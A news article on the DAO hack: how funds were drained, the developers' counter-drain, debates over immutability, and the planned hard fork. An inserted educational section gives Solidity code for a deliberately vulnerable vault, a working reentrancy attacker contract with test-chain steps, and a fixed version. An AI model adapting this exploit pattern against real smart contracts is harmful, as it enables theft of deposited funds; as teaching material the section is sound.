Ex-Ethereum Developer: How the DAO Hack Happened And What Comes Next


Kenneth Kappler, CCO of Ethcore and an ex-Ethereum developer, offered an insider's account of how the attack on the Decentralized Autonomous Organization (DAO) unfolded and his views on how future attacks can be prevented, according to Techworld. Kappler spoke at a London Tech Week event aimed at explaining blockchain technology.

Problems with the DAO code were evident to many people before the attack materialized, he said. Many realized the functionality wouldn't work as advertised and that token holders would have to vote to move the funds to new code. They expected to have to rewrite the code, redeploy it elsewhere and move the funds over.

The Hacker Strikes

Before the community had a chance to do this, however, someone found a way to use the bugs in the code to withdraw money from the DAO. This began at around 4 a.m. on a Friday. By 7 a.m., $45 million had been withdrawn, the price of ether had fallen 40 percent and the price of DAO tokens had fallen 70 percent.

The developers were able to identify the bug the hacker had exploited. They also realized that the hacker had moved the funds into another smart contract whose code prevented them from being moved out and sold on an exchange for 27 days, so the developers knew they had time to address the problem.
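The article does not name the bug. The DAO's withdrawal path could be re-entered: a contract receiving ether from it could call back into the DAO before the DAO had recorded that the caller's balance was spent, and so be paid repeatedly. The following is an added, simplified illustration of that class of flaw and of the standard fix; it is not the DAO's code nor anything from Ethcore, and the contract and function names (VulnerableVault, Reentrant, SafeVault) are made up for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// VulnerableVault: a deliberately minimal contract with the same class of
// flaw as the DAO's withdrawal path. It sends ether to the caller BEFORE it
// records that the caller has been paid, so a contract that calls withdraw()
// again from its receive() hook is paid again while its balance still reads
// as unspent. (Illustrative code, not the DAO's; names are made up.)
contract VulnerableVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        // BUG: interaction (external call) before effect (state update).
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "send failed");
        balances[msg.sender] = 0; // runs only after every nested call returned
    }
}

// Reentrant: deposits a small stake, calls withdraw(), and re-enters
// withdraw() from receive() for as long as the vault can still cover
// another payout of the same size.
contract Reentrant {
    VulnerableVault public target;
    address public owner;

    constructor(VulnerableVault _target) {
        target = _target;
        owner = msg.sender;
    }

    function attack() external payable {
        require(msg.sender == owner, "not owner");
        target.deposit{value: msg.value}();
        target.withdraw();
    }

    receive() external payable {
        uint256 stake = target.balances(address(this)); // still non-zero here
        if (stake > 0 && address(target).balance >= stake) {
            target.withdraw();
        }
    }

    function collect() external {
        require(msg.sender == owner, "not owner");
        payable(owner).transfer(address(this).balance);
    }
}

// SafeVault: the same vault with the two standard fixes. The balance is
// zeroed before the external call (checks-effects-interactions), and a
// mutex rejects any call that arrives while a withdrawal is in progress.
contract SafeVault {
    mapping(address => uint256) public balances;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0; // effect first ...
        (bool ok, ) = msg.sender.call{value: amount}(""); // ... interaction last
        require(ok, "send failed");
    }
}
```

To see the flaw on a local test chain: deploy VulnerableVault, deposit from an honest account, deploy Reentrant pointing at the vault and call attack() with a small amount of ether. Each payout triggers receive(), which calls withdraw() again before the first call has zeroed the attacker's balance, so the attacker leaves with its own stake plus the honest deposit (bounded only by gas and the EVM call-depth limit). Against SafeVault the nested withdraw() hits the mutex and reverts; that makes the outer `.call` return false, the outer `require(ok)` reverts the whole transaction, and the attacker gets nothing. Even without the mutex, the nested call would see a zero balance and fail on the first `require`.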

Immutability Is A Falsehood

The hack demonstrated that blockchain-based currencies are not immutable as claimed, Kappler said, since the systems rely on people accepting them. It is possible to build an alternative version of the chain, publish it to the network and see whether the network switches to it.

Four years ago, there was a similar situation with bitcoin, he noted.

To fix the DAO, the core developers decided to roll it back. There was concern, however, that rolling back the DAO could set a precedent whereby any transaction could be rolled back.

Developers Counterattack

The developers decided to mount a "white hat attack" on both the remaining funds in the DAO and the DAO attacker. They spammed the network with dust transactions and used the same exploit the attacker had relied on to withdraw funds from the original DAO, and were able to drain the hacker's smart contract.

The funds are now in separate places, giving the developers a chance to make alterations to the software.

Decisions to make such changes are difficult because public blockchains are social constructs and require acceptance by the community. The money only has value if everybody agrees that it does. If that trust is lost, because people no longer trust the code or believe they have been robbed, the system fails.

There have been adjustments made to bitcoin that have not severely affected its operation, Kappler noted.

Experiment In Decentralization

The developers could have designed the DAO to include administrative controls, such as a way for someone to halt the contract, but they did not want this. The DAO was an experiment to determine whether a system can exist without central control.

The solution to the DAO hack will come in the form of a hard fork: a change to the protocol that renders the hacked transactions invalid.

Ethcore is an Ethereum client that integrates directly into browsers, according to its website. It was founded by ex-Ethereum developers and offers an enterprise deployment called Parity.